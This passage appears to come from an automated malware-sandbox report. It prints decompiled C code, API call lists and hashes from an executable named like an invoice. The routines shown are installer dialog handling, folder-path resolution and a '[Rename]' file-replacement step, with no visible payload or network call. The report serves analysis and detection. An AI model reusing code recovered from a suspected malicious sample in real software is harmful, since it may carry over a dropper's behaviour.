                                                										 *0x79e938 = _t128;
                                                										goto L21;
                                                									}
                                                									__eflags =  *0x40a1dc - _t134; // 0xffffffff
                                                									if(__eflags <= 0) {
                                                										goto L25;
                                                									}
                                                									_push(0xffffffff);
                                                									goto L22;
                                                								}
                                                								_push(_t133);
                                                								goto L22;
                                                							}
                                                							SendMessageA(_t127, 0xf3, _t134, _t134);
                                                							_t104 = IsWindowEnabled(_t127);
                                                							__eflags = _t104;
                                                							if(_t104 == 0) {
                                                								goto L61;
                                                							}
                                                							goto L13;
                                                						}
                                                						SetWindowLongA(_t126, _t134, _t134);
                                                						return 1;
                                                					} else {
                                                						DestroyWindow( *0x7a2738);
                                                						 *0x7a2738 = _a12;
                                                						L58:
                                                						_t142 =  *0x7a0568 - _t134; // 0x0
                                                						if(_t142 == 0 &&  *0x7a2738 != _t134) {
                                                							ShowWindow(_t126, 0xa);
                                                							 *0x7a0568 = 1;
                                                						}
                                                						L61:
                                                						return 0;
                                                					}
                                                				}
                                                			}































                                                0x00403d5c
                                                0x00403d42
                                                0x00403d49
                                                0x00403d4f
                                                0x00403d51
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403d51
                                                0x00403d0d
                                                0x00000000
                                                0x00403ceb
                                                0x00403cf1
                                                0x00403cfb
                                                0x00404102
                                                0x00404102
                                                0x00404108
                                                0x00404115
                                                0x0040411b
                                                0x0040411b
                                                0x00404125
                                                0x00000000
                                                0x00404125
                                                0x00403ce9

                                                APIs
                                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC0
                                                • ShowWindow.USER32(?), ref: 00403CDD
                                                • DestroyWindow.USER32 ref: 00403CF1
                                                • SetWindowLongA.USER32 ref: 00403D0D
                                                • GetDlgItem.USER32 ref: 00403D2E
                                                • SendMessageA.USER32 ref: 00403D42
                                                • IsWindowEnabled.USER32(00000000), ref: 00403D49
                                                • GetDlgItem.USER32 ref: 00403DF7
                                                • GetDlgItem.USER32 ref: 00403E01
                                                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403E1B
                                                • SendMessageA.USER32 ref: 00403E6C
                                                • GetDlgItem.USER32 ref: 00403F12
                                                • ShowWindow.USER32(00000000,?), ref: 00403F33
                                                • EnableWindow.USER32(?,?), ref: 00403F45
                                                • EnableWindow.USER32(?,?), ref: 00403F60
                                                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403F76
                                                • EnableMenuItem.USER32 ref: 00403F7D
                                                • SendMessageA.USER32 ref: 00403F95
                                                • SendMessageA.USER32 ref: 00403FA8
                                                • lstrlenA.KERNEL32(0079F568,?,0079F568,00000000), ref: 00403FD2
                                                • SetWindowTextA.USER32(?,0079F568), ref: 00403FE1
                                                • ShowWindow.USER32(?,0000000A), ref: 00404115
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                • String ID:
                                                • API String ID: 184305955-0
                                                • Opcode ID: 71237030e8c29ac09b165d61707d34f86db9337277703e75395ea54945556abe
                                                • Instruction ID: 3358382e01a0dfa2f7aaf81ce727bcb664174c2c7b1baf79b3eefcfdc57a0ccd
                                                • Opcode Fuzzy Hash: 71237030e8c29ac09b165d61707d34f86db9337277703e75395ea54945556abe
                                                • Instruction Fuzzy Hash: 6EC1D171500200AFDB21AF25EE89D2B3AB9EB96706F00453EF641B51F1CB3D9992DB1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E004042C3(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                                                				intOrPtr _v8;
                                                				signed int _v12;
                                                				void* _v16;
                                                				struct HWND__* _t52;
                                                				long _t86;
                                                				int _t98;
                                                				struct HWND__* _t99;
                                                				signed int _t100;
                                                				intOrPtr _t109;
                                                				int _t110;
                                                				signed int* _t112;
                                                				signed int _t113;
                                                				char* _t114;
                                                				CHAR* _t115;
                                                
                                                				if(_a8 != 0x110) {
                                                					if(_a8 != 0x111) {
                                                						L11:
                                                						if(_a8 != 0x4e) {
                                                							if(_a8 == 0x40b) {
                                                								 *0x79e534 =  *0x79e534 + 1;
                                                							}
                                                							L25:
                                                							_t110 = _a16;
                                                							L26:
                                                							return E004041BF(_a8, _a12, _t110);
                                                						}
                                                						_t52 = GetDlgItem(_a4, 0x3e8);
                                                						_t110 = _a16;
                                                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
                                                							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
                                                							_t109 =  *((intOrPtr*)(_t110 + 0x18));
                                                							_v12 = _t100;
                                                							_v16 = _t109;
                                                							_v8 = 0x7a1f00;
                                                							if(_t100 - _t109 < 0x800) {
                                                								SendMessageA(_t52, 0x44b, 0,  &_v16);
                                                								SetCursor(LoadCursorA(0, 0x7f02));
                                                								_push(1);
                                                								E00404567(_a4, _v8);
                                                								SetCursor(LoadCursorA(0, 0x7f00));
                                                								_t110 = _a16;
                                                							}
                                                						}
                                                						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
                                                							goto L26;
                                                						} else {
                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
                                                								SendMessageA( *0x7a2f68, 0x111, 1, 0);
                                                							}
                                                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
                                                								SendMessageA( *0x7a2f68, 0x10, 0, 0);
                                                							}
                                                							return 1;
                                                						}
                                                					}
                                                					if(_a12 >> 0x10 != 0 ||  *0x79e534 != 0) {
                                                						goto L25;
                                                					} else {
                                                						_t112 =  *0x79ed40 + 0x14;
                                                						if(( *_t112 & 0x00000020) == 0) {
                                                							goto L25;
                                                						}
                                                						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                						E0040417A(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                						E00404543();
                                                						goto L11;
                                                					}
                                                				}
                                                				_t98 = _a16;
                                                				_t113 =  *(_t98 + 0x30);
                                                				if(_t113 < 0) {
                                                					_t113 =  *( *0x7a273c - 4 + _t113 * 4);
                                                				}
                                                				_push( *((intOrPtr*)(_t98 + 0x34)));
                                                				_t114 = _t113 +  *0x7a2fb8;
                                                				_push(0x22);
                                                				_a16 =  *_t114;
                                                				_v12 = _v12 & 0x00000000;
                                                				_t115 = _t114 + 1;
                                                				_v16 = _t115;
                                                				_v8 = E0040428E;
                                                				E00404158(_a4);
                                                				_push( *((intOrPtr*)(_t98 + 0x38)));
                                                				_push(0x23);
                                                				E00404158(_a4);
                                                				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                				E0040417A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                                                				_t99 = GetDlgItem(_a4, 0x3e8);
                                                				E0040418D(_t99);
                                                				SendMessageA(_t99, 0x45b, 1, 0);
                                                				_t86 =  *( *0x7a2f74 + 0x68);
                                                				if(_t86 < 0) {
                                                					_t86 = GetSysColor( ~_t86);
                                                				}
                                                				SendMessageA(_t99, 0x443, 0, _t86);
                                                				SendMessageA(_t99, 0x445, 0, 0x4010000);
                                                				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
                                                				 *0x79e534 = 0;
                                                				SendMessageA(_t99, 0x449, _a16,  &_v16);
                                                				 *0x79e534 = 0;
                                                				return 0;
                                                			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: N
                                                • API String ID: 3103080414-1130791706
                                                • Opcode ID: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                • Instruction ID: 9df2d5718f770f504e0a3d1761d641f71338e4c23cddda8a7d5dd424fc5a0579
                                                • Opcode Fuzzy Hash: 89bfaba4aad14bbdc3ef2aca23760d41403bea85feb245a06943091ca1e46a07
                                                • Instruction Fuzzy Hash: 2A61B1B1A40208BFDF109F60DD45F6A3B69FB84715F10802AFB05BA2D1D7B8A951CF99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 90%
                                                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                				struct tagLOGBRUSH _v16;
                                                				struct tagRECT _v32;
                                                				struct tagPAINTSTRUCT _v96;
                                                				struct HDC__* _t70;
                                                				struct HBRUSH__* _t87;
                                                				struct HFONT__* _t94;
                                                				long _t102;
                                                				signed int _t126;
                                                				struct HDC__* _t128;
                                                				intOrPtr _t130;
                                                
                                                				if(_a8 == 0xf) {
                                                					_t130 =  *0x7a2f74;
                                                					_t70 = BeginPaint(_a4,  &_v96);
                                                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                					_a8 = _t70;
                                                					GetClientRect(_a4,  &_v32);
                                                					_t126 = _v32.bottom;
                                                					_v32.bottom = _v32.bottom & 0x00000000;
                                                					while(_v32.top < _t126) {
                                                						_a12 = _t126 - _v32.top;
                                                						asm("cdq");
                                                						asm("cdq");
                                                						asm("cdq");
                                                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                						_t87 = CreateBrushIndirect( &_v16);
                                                						_v32.bottom = _v32.bottom + 4;
                                                						_a16 = _t87;
                                                						FillRect(_a8,  &_v32, _t87);
                                                						DeleteObject(_a16);
                                                						_v32.top = _v32.top + 4;
                                                					}
                                                					if( *(_t130 + 0x58) != 0xffffffff) {
                                                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                                                						_a16 = _t94;
                                                						if(_t94 != 0) {
                                                							_t128 = _a8;
                                                							_v32.left = 0x10;
                                                							_v32.top = 8;
                                                							SetBkMode(_t128, 1);
                                                							SetTextColor(_t128,  *(_t130 + 0x58));
                                                							_a8 = SelectObject(_t128, _a16);
                                                							DrawTextA(_t128, 0x7a2760, 0xffffffff,  &_v32, 0x820);
                                                							SelectObject(_t128, _a8);
                                                							DeleteObject(_a16);
                                                						}
                                                					}
                                                					EndPaint(_a4,  &_v96);
                                                					return 0;
                                                				}
                                                				_t102 = _a16;
                                                				if(_a8 == 0x46) {
                                                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                					 *((intOrPtr*)(_t102 + 4)) =  *0x7a2f68;
                                                				}
                                                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                                                			}

                                                APIs
                                                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32 ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32 ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextA.USER32(00000000,007A2760,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                • Instruction ID: 8cb536a74e8a95367a30f9a40e648d77c0c0257b52f8be6e86691cf172308c2f
                                                • Opcode Fuzzy Hash: 2b80ecd39af3c7aade96203546a39d5d88e703590141695a35fb255926c22a0b
                                                • Instruction Fuzzy Hash: 1D417B71800249AFCF058FA5DE459AF7BB9FF45314F00802AF991AA1A0C7789A55DFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00405D43(void* __ecx) {
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				long _t12;
                                                				long _t24;
                                                				char* _t31;
                                                				int _t37;
                                                				void* _t38;
                                                				intOrPtr* _t39;
                                                				long _t42;
                                                				CHAR* _t44;
                                                				void* _t46;
                                                				void* _t48;
                                                				void* _t49;
                                                				void* _t52;
                                                				void* _t53;
                                                
                                                				_t38 = __ecx;
                                                				_t44 =  *(_t52 + 0x14);
                                                				 *0x7a12f8 = 0x4c554e;
                                                				if(_t44 == 0) {
                                                					L3:
                                                					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x7a16f8, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						_t37 = wsprintfA(0x7a0ef8, "%s=%s\r\n", 0x7a12f8, 0x7a16f8);
                                                						_t53 = _t52 + 0x10;
                                                						E00406167(_t37, 0x400, 0x7a16f8, 0x7a16f8,  *((intOrPtr*)( *0x7a2f74 + 0x128)));
                                                						_t12 = E00405C6D(0x7a16f8, 0xc0000000, 4);
                                                						_t48 = _t12;
                                                						 *(_t53 + 0x18) = _t48;
                                                						if(_t48 != 0xffffffff) {
                                                							_t42 = GetFileSize(_t48, 0);
                                                							_t6 = _t37 + 0xa; // 0xa
                                                							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                							if(_t46 == 0 || E00405CE5(_t48, _t46, _t42) == 0) {
                                                								L18:
                                                								return CloseHandle(_t48);
                                                							} else {
                                                								if(E00405BD2(_t38, _t46, "[Rename]\r\n") != 0) {
                                                									_t49 = E00405BD2(_t38, _t21 + 0xa, 0x40a3d8);
                                                									if(_t49 == 0) {
                                                										_t48 =  *(_t53 + 0x18);
                                                										L16:
                                                										_t24 = _t42;
                                                										L17:
                                                										E00405C28(_t24 + _t46, 0x7a0ef8, _t37);
                                                										SetFilePointer(_t48, 0, 0, 0);
                                                										E00405D14(_t48, _t46, _t42 + _t37);
                                                										GlobalFree(_t46);
                                                										goto L18;
                                                									}
                                                									_t39 = _t46 + _t42;
                                                									_t31 = _t39 + _t37;
                                                									while(_t39 > _t49) {
                                                										 *_t31 =  *_t39;
                                                										_t31 = _t31 - 1;
                                                										_t39 = _t39 - 1;
                                                									}
                                                									_t24 = _t49 - _t46 + 1;
                                                									_t48 =  *(_t53 + 0x18);
                                                									goto L17;
                                                								}
                                                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                								_t42 = _t42 + 0xa;
                                                								goto L16;
                                                							}
                                                						}
                                                					}
                                                				} else {
                                                					CloseHandle(E00405C6D(_t44, 0, 1));
                                                					_t12 = GetShortPathNameA(_t44, 0x7a12f8, 0x400);
                                                					if(_t12 != 0 && _t12 <= 0x400) {
                                                						goto L3;
                                                					}
                                                				}
                                                				return _t12;
                                                			}


                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405ED4,?,?), ref: 00405D74
                                                • GetShortPathNameA.KERNEL32(?,007A12F8,00000400), ref: 00405D7D
                                                  • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BE2
                                                  • Part of subcall function 00405BD2: lstrlenA.KERNEL32(00000000,?,00000000,00405E2D,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405C14
                                                • GetShortPathNameA.KERNEL32(?,007A16F8,00000400), ref: 00405D9A
                                                • wsprintfA.USER32 ref: 00405DB8
                                                • GetFileSize.KERNEL32(00000000,00000000,007A16F8,C0000000,00000004,007A16F8,?,?,?,?,?), ref: 00405DF3
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405E02
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E3A
                                                • SetFilePointer.KERNEL32(0040A3D8,00000000,00000000,00000000,00000000,007A0EF8,00000000,-0000000A,0040A3D8,00000000,[Rename],00000000,00000000,00000000), ref: 00405E90
                                                • GlobalFree.KERNEL32 ref: 00405EA1
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405EA8
                                                  • Part of subcall function 00405C6D: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Invoice 6500TH21Y5674.exe,80000000,00000003), ref: 00405C71
                                                  • Part of subcall function 00405C6D: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %s=%s$[Rename]
                                                • API String ID: 2171350718-1727408572
                                                • Opcode ID: 61217faea5070430dba93366d5d1ba3c45b8a2833e6ad8f6ba82dc6a1e1a4478
                                                • Instruction ID: 3bd9902b6e4cfcbbd8c27daddc785bf5092739fd3612ff4c635abc71f9dbf801
                                                • Opcode Fuzzy Hash: 61217faea5070430dba93366d5d1ba3c45b8a2833e6ad8f6ba82dc6a1e1a4478
                                                • Instruction Fuzzy Hash: 30312531200B156FD3206B75DD48F2B3A5CDF85754F14043AB981F62D2DB7CE9018AAD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 72%
                                                			E00406167(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                                                				struct _ITEMIDLIST* _v8;
                                                				char _v12;
                                                				signed int _v16;
                                                				signed char _v20;
                                                				signed int _v24;
                                                				signed char _v28;
                                                				signed int _t38;
                                                				CHAR* _t39;
                                                				signed int _t41;
                                                				char _t52;
                                                				char _t53;
                                                				char _t55;
                                                				char _t57;
                                                				void* _t65;
                                                				char* _t66;
                                                				signed int _t80;
                                                				char _t88;
                                                				void* _t89;
                                                				CHAR* _t90;
                                                				void* _t92;
                                                				signed int _t97;
                                                				signed int _t99;
                                                				void* _t100;
                                                
                                                				_t92 = __esi;
                                                				_t89 = __edi;
                                                				_t65 = __ebx;
                                                				_t38 = _a8;
                                                				if(_t38 < 0) {
                                                					_t38 =  *( *0x7a273c - 4 + _t38 * 4);
                                                				}
                                                				_push(_t65);
                                                				_push(_t92);
                                                				_push(_t89);
                                                				_t66 = _t38 +  *0x7a2fb8;
                                                				_t39 = 0x7a1f00;
                                                				_t90 = 0x7a1f00;
                                                				if(_a4 >= 0x7a1f00 && _a4 - 0x7a1f00 < 0x800) {
                                                					_t90 = _a4;
                                                					_a4 = _a4 & 0x00000000;
                                                				}
                                                				while(1) {
                                                					_t88 =  *_t66;
                                                					if(_t88 == 0) {
                                                						break;
                                                					}
                                                					__eflags = _t90 - _t39 - 0x400;
                                                					if(_t90 - _t39 >= 0x400) {
                                                						break;
                                                					}
                                                					_t66 = _t66 + 1;
                                                					__eflags = _t88 - 4;
                                                					_a8 = _t66;
                                                					if(__eflags >= 0) {
                                                						if(__eflags != 0) {
                                                							 *_t90 = _t88;
                                                							_t90 =  &(_t90[1]);
                                                							__eflags = _t90;
                                                						} else {
                                                							 *_t90 =  *_t66;
                                                							_t90 =  &(_t90[1]);
                                                							_t66 = _t66 + 1;
                                                						}
                                                						continue;
                                                					}
                                                					_t41 =  *((char*)(_t66 + 1));
                                                					_t80 =  *_t66;
                                                					_t97 = (_t41 & 0x0000007f) << 0x00000007 | _t80 & 0x0000007f;
                                                					_v24 = _t80;
                                                					_v28 = _t80 | 0x00000080;
                                                					_v16 = _t41;
                                                					_v20 = _t41 | 0x00000080;
                                                					_t66 = _a8 + 2;
                                                					__eflags = _t88 - 2;
                                                					if(_t88 != 2) {
                                                						__eflags = _t88 - 3;
                                                						if(_t88 != 3) {
                                                							__eflags = _t88 - 1;
                                                							if(_t88 == 1) {
                                                								__eflags = (_t41 | 0xffffffff) - _t97;
                                                								E00406167(_t66, _t90, _t97, _t90, (_t41 | 0xffffffff) - _t97);
                                                							}
                                                							L42:
                                                							_t90 =  &(_t90[lstrlenA(_t90)]);
                                                							_t39 = 0x7a1f00;
                                                							continue;
                                                						}
                                                						__eflags = _t97 - 0x1d;
                                                						if(_t97 != 0x1d) {
                                                							__eflags = (_t97 << 0xa) + 0x7a4000;
                                                							E004060D4(_t90, (_t97 << 0xa) + 0x7a4000);
                                                						} else {
                                                							E00406032(_t90,  *0x7a2f68);
                                                						}
                                                						__eflags = _t97 + 0xffffffeb - 7;
                                                						if(_t97 + 0xffffffeb < 7) {
                                                							L33:
                                                							E004063AF(_t90);
                                                						}
                                                						goto L42;
                                                					}
                                                					_t52 =  *0x7a2f6c;
                                                					__eflags = _t52;
                                                					_t99 = 2;
                                                					if(_t52 >= 0) {
                                                						L13:
                                                						_a8 = 1;
                                                						L14:
                                                						__eflags =  *0x7a3004;
                                                						if( *0x7a3004 != 0) {
                                                							_t99 = 4;
                                                						}
                                                						__eflags = _t80;
                                                						if(__eflags >= 0) {
                                                							__eflags = _t80 - 0x25;
                                                							if(_t80 != 0x25) {
                                                								__eflags = _t80 - 0x24;
                                                								if(_t80 == 0x24) {
                                                									GetWindowsDirectoryA(_t90, 0x400);
                                                									_t99 = 0;
                                                								}
                                                								while(1) {
                                                									__eflags = _t99;
                                                									if(_t99 == 0) {
                                                										goto L30;
                                                									}
                                                									_t53 =  *0x7a2f64;
                                                									_t99 = _t99 - 1;
                                                									__eflags = _t53;
                                                									if(_t53 == 0) {
                                                										L26:
                                                										_t55 = SHGetSpecialFolderLocation( *0x7a2f68,  *(_t100 + _t99 * 4 - 0x18),  &_v8);
                                                										__eflags = _t55;
                                                										if(_t55 != 0) {
                                                											L28:
                                                											 *_t90 =  *_t90 & 0x00000000;
                                                											__eflags =  *_t90;
                                                											continue;
                                                										}
                                                										__imp__SHGetPathFromIDListA(_v8, _t90);
                                                										_v12 = _t55;
                                                										__imp__CoTaskMemFree(_v8);
                                                										__eflags = _v12;
                                                										if(_v12 != 0) {
                                                											goto L30;
                                                										}
                                                										goto L28;
                                                									}
                                                									__eflags = _a8;
                                                									if(_a8 == 0) {
                                                										goto L26;
                                                									}
                                                									_t57 =  *_t53( *0x7a2f68,  *(_t100 + _t99 * 4 - 0x18), 0, 0, _t90);
                                                									__eflags = _t57;
                                                									if(_t57 == 0) {
                                                										goto L30;
                                                									}
                                                									goto L26;
                                                								}
                                                								goto L30;
                                                							}
                                                							GetSystemDirectoryA(_t90, 0x400);
                                                							goto L30;
                                                						} else {
                                                							E00405FBB((_t80 & 0x0000003f) +  *0x7a2fb8, __eflags, 0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t80 & 0x0000003f) +  *0x7a2fb8, _t90, _t80 & 0x00000040);
                                                							__eflags =  *_t90;
                                                							if( *_t90 != 0) {
                                                								L31:
                                                								__eflags = _v16 - 0x1a;
                                                								if(_v16 == 0x1a) {
                                                									lstrcatA(_t90, "\\Microsoft\\Internet Explorer\\Quick Launch");
                                                								}
                                                								goto L33;
                                                							}
                                                							E00406167(_t66, _t90, _t99, _t90, _v16);
                                                							L30:
                                                							__eflags =  *_t90;
                                                							if( *_t90 == 0) {
                                                								goto L33;
                                                							}
                                                							goto L31;
                                                						}
                                                					}
                                                					__eflags = _t52 - 0x5a04;
                                                					if(_t52 == 0x5a04) {
                                                						goto L13;
                                                					}
                                                					__eflags = _v16 - 0x23;
                                                					if(_v16 == 0x23) {
                                                						goto L13;
                                                					}
                                                					__eflags = _v16 - 0x2e;
                                                					if(_v16 == 0x2e) {
                                                						goto L13;
                                                					} else {
                                                						_a8 = _a8 & 0x00000000;
                                                						goto L14;
                                                					}
                                                				}
                                                				 *_t90 =  *_t90 & 0x00000000;
                                                				if(_a4 == 0) {
                                                					return _t39;
                                                				}
                                                				return E004060D4(_a4, _t39);
                                                			}



























                                                APIs
                                                • GetSystemDirectoryA.KERNEL32(007A1F00,00000400), ref: 00406292
                                                • GetWindowsDirectoryA.KERNEL32(007A1F00,00000400,?,0079ED48,00000000,00405233,0079ED48,00000000), ref: 004062A5
                                                • SHGetSpecialFolderLocation.SHELL32(00405233,73BCEA30,?,0079ED48,00000000,00405233,0079ED48,00000000), ref: 004062E1
                                                • SHGetPathFromIDListA.SHELL32(73BCEA30,007A1F00), ref: 004062EF
                                                • CoTaskMemFree.OLE32(73BCEA30), ref: 004062FB
                                                • lstrcatA.KERNEL32(007A1F00,\Microsoft\Internet Explorer\Quick Launch), ref: 0040631F
                                                • lstrlenA.KERNEL32(007A1F00,?,0079ED48,00000000,00405233,0079ED48,00000000,00000000,00798F20,73BCEA30), ref: 00406371
                                                Strings
                                                • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00406319
                                                • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406261
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.686270635.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.686246324.0000000000400000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686303230.0000000000408000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.686323317.000000000040A000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686385427.000000000077B000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686432272.0000000000780000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686463037.0000000000785000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686508318.0000000000787000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686555387.0000000000792000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686599667.00000000007A0000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686616323.00000000007A9000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.686646722.00000000007AC000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                • API String ID: 717251189-730719616
                                                • Opcode ID: 4a49ac3d45dd29d6e1b76d5fdd13ffd3c16fb6047165712eb687eb4b6aa95570
                                                • Instruction ID: 6e1ed981659f24e818377f3a16580b7a42bd992c39e8c3c65ac9697aa82fb6a7
                                                • Opcode Fuzzy Hash: 4a49ac3d45dd29d6e1b76d5fdd13ffd3c16fb6047165712eb687eb4b6aa95570
                                                • Instruction Fuzzy Hash: C861E571900210AEEB149F28DC94BBE7BA49B46314F12413FED43B62D1D73C4961CB9E
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E004051FB(CHAR* _a4, CHAR* _a8) {
                                                				struct HWND__* _v8;
                                                				signed int _v12;
                                                				CHAR* _v32;
                                                				long _v44;
                                                				int _v48;
                                                				void* _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				CHAR* _t26;
                                                				signed int _t27;
                                                				CHAR* _t28;
                                                				long _t29;
                                                				signed int _t39;
                                                
